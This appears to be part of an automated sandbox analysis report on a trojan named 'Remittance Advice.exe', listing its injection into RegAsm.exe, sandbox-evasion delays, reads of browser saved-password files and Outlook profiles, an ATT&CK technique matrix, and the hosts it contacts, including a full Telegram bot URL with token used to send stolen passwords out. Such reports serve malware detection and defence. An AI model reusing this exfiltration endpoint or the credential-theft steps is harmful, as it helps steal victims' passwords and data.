                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597641s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597392s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596693s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596563s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596341s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -596016s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -595016s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594905s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -594016s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -593891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599786Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599435Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597392Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596693Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596341Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593891Jump to behavior
                Source: RegAsm.exe, 00000003.00000002.3924752542.0000000000805000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_009EC168 LdrInitializeThunk,LdrInitializeThunk,3_2_009EC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeQueries volume information: C:\Users\user\Desktop\Remittance Advice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                1
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Remittance Advice.exe74%VirustotalBrowse
                Remittance Advice.exe74%ReversingLabsByteCode-MSIL.Trojan.MassloggerRAT
                Remittance Advice.exe100%AviraHEUR/AGEN.1306813
                Remittance Advice.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.32.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.orgRegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://reallyfreegeoip.org/xml/8.46.123.189lRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botRegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://checkip.dyndns.comdRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://checkip.dyndns.org/qRemittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://reallyfreegeoip.orgdRegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://reallyfreegeoip.org/xml/8.46.123.189dRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgRegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.orgdRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.orgRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://api.telegram.orgdRegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.000000000261E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://api.telegram.orgRegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.org/dRegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000003.00000002.3925485260.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.telegram.org/bot-/sendDocument?chat_id=Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    149.154.167.220
                                                                    api.telegram.orgUnited Kingdom
                                                                    62041TELEGRAMRUfalse
                                                                    104.21.32.1
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    193.122.130.0
                                                                    checkip.dyndns.comUnited States
